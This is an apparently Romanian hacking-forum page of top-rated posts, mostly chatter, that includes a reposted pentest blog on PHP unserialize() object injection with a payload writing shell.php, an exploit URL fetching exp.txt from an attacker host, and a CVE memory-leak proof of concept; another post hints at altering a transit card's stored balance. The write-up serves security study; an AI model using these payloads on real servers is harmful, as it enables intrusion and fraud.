Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 07/10/16 in all areas

  1. Se pare ca ultima valoare era gresita si nu era 1.5lei era 0 lei. Valoarea care o ai pe card pentru 4.5lei este (0x00, 0x8e, 0x10) 0x008e10 din care se scade 0x008000 = 0xe10 valoare pe care o impartim la 8 = 0x1c2 = 450 Dar ultimii 2 biti din block se schimba si probabil sunt un checksum Nu stiu daca ma credeti dar am visat asta
    3 points
  2. Ai descoperit apa calda si mersul pe jos Inainte sa postezi ceva, macar de curiozitate da un search pe forum
    3 points
  3. După ce le faci reclamație la Poliție și le-or veni citațiile acasă, sigur o să le șteargă singuri.
    3 points
  4. Am si eu un cuvant de spus Lasati mamele sa vina la mine! :)))))
    2 points
  5. Tutorial Aplicatia asta a fost la cereri mai de mult.Si bineinteles ca aveti nevoie de excel instalat. Versiunea x32 http://www90.zippyshare.com/v/JJrmpMrO/file.html La cerere si x64 http://www12.zippyshare.com/v/EfeSks9S/file.html Enjoy
    1 point
  6. At NotSoSecure, we conduct Pen Test/ Code Reviews on a day-to-day basis and we recently came across an interesting piece of PHP code that could lead to RCE, but the exploitation was bit tricky. After spending some sleepless nights trying to break this code, we identified that both application and system level code execution was possible using the vulnerability. This blog post from Rahul Sasi will shed some info on the bug and exploitation part. The vulnerable code: PHP Vulnerable code In the above code, user controlled value could be passed on to PHP un-serialization function. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize(). Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. In our code the application takes a file name, which gets read using PHP file_get_contents function. The output is then fed to php unserialize module. With the above bug both application level and system level code executions is possible, we will get into that soon. PHP Unserialize In order to successfully exploit the above bug three conditions must be satisfied: The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be used to carry out malicious attacks, or to start a “POP chain”. All of the classes used during the attack must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for such classes . The data passed to unserialized comes from a file, so a file with serialized data must be present on the server. Ref: https://www.owasp.org/index.php/PHP_Object_Injection In the above scenario, conditions 1 and 2 are satisfied for exploitation. But since the input to un-searilized comes from a file read by PHPfile_get_contents, it was bit tricky to exploit. PHP function file_get_contents can be passed with remote URLs if allow_url_fopen is enabled (on latest PHP versions its disabled by default). In one such case an attacker could pass in a url with a file containing serialized malicious data hosted on a remote server. http://vul-server/unsearilize.php?session_filename=http://attacker/exp.txt Contents of exp.txt O:3:%22foo%22:2:{s:4:%22file%22;s:9:%22shell.php%22;s:4:%22data%22;s:5:%22aaaa%22;} But unfortunately allow_url_fopen was not enabled on the applications we were testing. Note: It is not possible to include a file like /proc/self/environor anything similar (like access logs) since, a serialized string should not contain garbage data. So our file should only contain the serialized data for the exploit to work. Before we move on to how to exploit the above code let me explain a bit on PHP object injection exploit and what the above payload does. PHP Object Injection: Php Unserialization based security issues were first documented by Stefan Esser in 2009 . These days with the increase in number of json based applications serialization modules are used a lot. Lets learn more about the serialization modules. PHP Serialization: In order to preserve the contents on an array PHP has this function called serialize() ,it converts an array, given as parameter, into a normal string that you can be saved in a file, passed as an input to a URL etc. PHP serialize function Ref: http://www.hackingwithphp.com/5/11/0/saving-arrays Serialization example: Serializing a 3 char string array. Example Serialize 3 char string array Understanding the serialized string Understanding serialized string a:3{ Array of 3 values i:0 Integer, value [ index-0] S:5:”Lorem” String, 5 chars long, string value “Lorem” i:1 Integer, value [index-1] S:5:”Ipsum” String , 5 chars long, string value “Ipsum” i:2 Integer, value [index-2] S:5:”Dolor” String , 5 chars long, string value “Dolor” PHP UnSerialization unserialization() is the opposite of serialize(). It takes a serialized string and converts it back to an array object. Un-serialization can result in code being loaded and executed due to object instantiation and auto loading. Example: value=‘a:1:{s:4:"Test";s:17:"Unserializationhere!";}’ unserialize($value); Php Autoloading: In PHP, we can define some special functions that will be called automatically. Such functions require no function call to execute the code inside. With this special feature, these are commonly referred as magic functions or magic methods. PHP magic method names are limited with some list of PHP supported keywords, like construct, destruct etc. The most commonly used magic function is __construct(). This is because as of PHP version 5, the __construct method is basically the constructor for your class. If PHP 5 can not find the __construct() function for a given class, then it will search for a function with the same name as the class name – this is the old way of writing constructors in PHP, where you would just define a function with the same name as the class. Here are few magic functions in php: __construct(), __destruct(), __call(), __callSt atic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone(), and __autoload(). Here are few magic methods in php: Exception::__toStringErrorException::__toStringDateTime::__wakeupReflectionException::__toStringReflectionFunctionAbstract::__toStringReflectionFunction::__toStringReflectionParameter::__toStringReflectionMethod::__toStringReflectionClass::__toStringReflectionObject::__toStringReflectionProperty::__toStringReflectionExtension::__toStringLogicException::__toStringBadFunctionCallException::__toStringBadMethodCallException::__toStringDomainException::__toStringInvalidArgumentException::__toStringLengthException::__toStringOutOfRangeException::__toStringRuntimeException::__toString Ref: http://www.programmerinterview.com/index.php/php-questions/php-what-are-magic-functions/ Object instantiation: Instantiation is when a class becomes an object by creating an instance of the class in memory. So when you actually call new class(), class() is now an instantiated object. When you un-serialize a string that is exactly what php does [Object instantiation], converts a string of arrays into objects. Un-serializing objects allows to control all properties a) public protected c) private, however un-serialized objects get woken up __wakeup() and later destroyed via __destruct(), and hence already existing code placed inside these[wakeup,destruct] magic function gets executed. Ref:http://www.nds.rub.de/media/nds/attachments/files/2011/02/RUB2011-SecurityProblemsInWebApplicationsExceptInjectionVulnerabilities.pdf So we need to find existing usable code defined inside _destruct or _wakeup, and then hijack the flow of the application. In our vulnerable program we have destruct with a function file_put_contents: Destruct with file_put_contents So our payload looks like: O:3:%22foo%22:2:{s:4:%22file%22;s:9:%22shell.php%22;s:4:%22data%22;s:5:%22aaaa%22;} O:3{: [ Object, takes 3 parameter with name foo] ”foo”: 2:{ [Parameter foo takes 2 values] S:4:”file”;s:9:”shell.php”; [String, 4 chars long, value “file”, string 9 chars long, value shell.php] s:4:”data”;s:5:”aaaa”;} String, 4 chars long, string 5 chars long, value”aaaa” So when our above input string is un-serialized it allows controlling the properties of the class “foo”. An already existing code that is inside a magic method “_destruct” gets executed with our controlled values, in our case file_put_contents, creating a file “shell.php”. Exploitation: Since in our case, the input to Unserialization is the file read from file_get_contents. $file_name = $_GET['session_filename']; unserialize(file_get_contents($file )); One of the things we were trying out was to find a method to put up the exp.txt on the server. For this we had to find a file/image upload feature. And then uploaded the file with the serialized payload. Then all we had to do was trigger , the following way. http://vul-server/unsearilize.php?session_filename=images/exp.txt Alternately system level RCE is possible using CVE-2014-8142 and CVE-2015-0231 “Use-after-free vulnerability in the process_nested_data function in ext/standard/var_Unserializationr.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted Unserialization call that leverages improper handling of duplicate keys within the serialized properties of an object .” https://bugs.php.net/bug.php?id=68710 The above bug affects core php unsearilize function. The poc was released by Stefan Esser, we tried to optimize and make a code execution possible with the bug. Since its possible to attain system level RCE if successfully exploited. PHP + Apache Security Architecture: PHP Architecture These diagrams are good enough to explain php architecture in detail. 1) So if we could execute code in context of PHP , we would be able to break out of many restrictions. 2) Should be able to get shell access to hardned PHP Hosts. I am still working on this. And I have found that “Tim Michaud” from innulled is working on the same http://www.inulledmyself.com/2015/02/exploiting-memory-corruption-bugs-in.html . We will update this blog soon. http://[IP]/unserialize_rce_poc.php?s=O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:50:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA11111111111";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}'; POC code to leak memory POC code to leak memory POC code to leak memory References: http://www.inulledmyself.com/2015/02/exploiting-memory-corruption-bugs-in.html https://www.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes http://php-autoloader.malkusch.de/en https://hakre.wordpress.com/2013/02/10/php-autoload-invalid-classname-injection http://security.stackexchange. com/questions/77549/is-php-Unserialization-exploitable-without-any-interesting- http://xahlee.info/php-doc/ http://phppot.com/php/php-magic-methods http://php.net/manual/en/ http://stackoverflow.com/questions/11630341/real-time-use-of-php-magic-methods-sleep-and-wakeup Source :
    1 point
  7. Cică criptografia zice că dacă spargi un sistem de criptare, înseamnă că îi știi cheia. Modifici valorile și cu cheia aflată criptezi folosind algoritmul de criptare respectiv.
    1 point
  8. Facem petitie online pentru demiteria moderatorului basist aa7670?Care ajutat de nimeni altul decat Traian Basescu a dus la caderea RST-ului.
    1 point
  9. thank you but the second link you gave us give the following error : The org parameter is not valid. Your request could not be processed. Have your library contact lynda.com. Your request could not be processed. Check your card and PIN and try again. If problems persist, contact your library.
    1 point
  10. Te astepti ca pe o comunitate IT sa gasesti oameni cu IQ peste medie. Ei bine, se pare ca te inseli. :)))))))
    1 point
  11. Am si eu nevoie de cartea. "Mi-o frec pana o-ndrept" si "Loveste-o cu ea in piept"
    1 point
  12. Nu e cazul... Doar ca ar trebui sa inveti ca NIMIC in viata asta nu e gratis prietene. Atata timp cat eu nu ti-am cerut tie niciun ban pentru informatia pe care ti-am oferit-o, nu vad unde te arde pe tine daca dau eu cod de referal sau doar iti ofer link-ul catre site. Abtine-te ;)
    -1 points
  13. Caut colaborator vanzari pentru un site de game hosting. Responsabilitati: - Gasirea prin mijloacele proprii de potentiali clienti. - Sporirea vanzarilor produselor noastre. - Experienta in domeniu constituie avantaj. Avantaje: - Se ofera comision avantajos pentru fiecare client nou adus ce isi duce comanda la bun sfarsit. - Program flexibil, ma intereseaza doar sporirea vanzarilor. Descriere: Am nevoie de un om cu experienta in domeniu care sa promoveze produsele noastre in vederea cresterii vanzarilor. Se ofera comision 5 RON pentru fiecare client nou adus. Nu se impune o anumita limita de clienti. Platile catre site-ul nostru se pot face Paypal / bancar. Platile catre colaborator se vor face prin transfer bancar, la acumularea sumei de minim 50 RON. Pentru mai multe informatii ma puteti contacta prin PM.
    -1 points
  14. Salut, vreau sa impartasesc cu voi un host gratuit foarte smecher pe care l-am gasit de curand. Se numeste GoogieHost si personal o sa-l folosesc MULT MULT timp de acum incolo. Caut de aproape 2 luni un host gratuit bun si pana acum nu e nici unul care sa se poata compara cu ei. Tot ce iti cer oamenii mai tarziu este sa le faci reclama pe oriunde poti, doar daca vrei desigur . Servicii oferite: 1000 MB Spatiu Stocare Bandwidth nelimitat 2 adrese mail (SMTP, IMAP, POP3 si webmail ,toate functionale si testate) AutoInstaller Scripturi SEO Tools CDN (CloudFlare) GRATUIT Backup lunar 99.95% Uptime Etc. https://client.googiehost.com/aff.php?aff=966 <- Acesta este link-ul pentru a va face cont, este din programul lor de referal, program destul de interesant de asemenea. Eu am hostate deja 2 domenii si 1 subdomeniu la ei si nu am nici macar un singur lucru sa le reprosez... Daca aveti nevoie de mai multe informatii sau ajutor, astept mesajele voastre! Big UP!
    -1 points
  15. caut, Bots, Flooders etc. pentru Direct Connect p2p mulțumesc
    -2 points
  16. Salut baieti, Pentru toti cei care vor sa faca o copie a oricarui website, va recomand (dupa lungi testari) HTTrack Website Copier. Interfata nu este foarte complicata asa ca nu o sa intru prea mult in detalii, va las sa experimentati ... ai nevoie doar de cateva tweak-uri si multa rabdare pentru a copia ORICE site. Eu am incercat mai multe, de la site-uri simple pana la unele cu securitate ridicata. Cea mai mare problema pe care o poti intalni atunci cand vrei sa copiezi un website este aceea a conexiunii programului catre website, deci, acolo va trebui sa umblati un pic in cazul in care nu reusiti (tipul de browser, etc.) . Daca aveti ceva intrebari si va pot ajuta, nu ezitati sa postati aici . Multa bafta! Link download si mai multe informatii(Engleza) aici : http://www.httrack.com/
    -3 points
×
×
  • Create New...